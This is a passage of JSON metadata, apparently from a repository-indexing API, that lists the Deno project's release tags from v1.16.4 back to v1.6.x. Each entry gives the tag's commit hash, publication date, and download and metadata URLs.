deno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.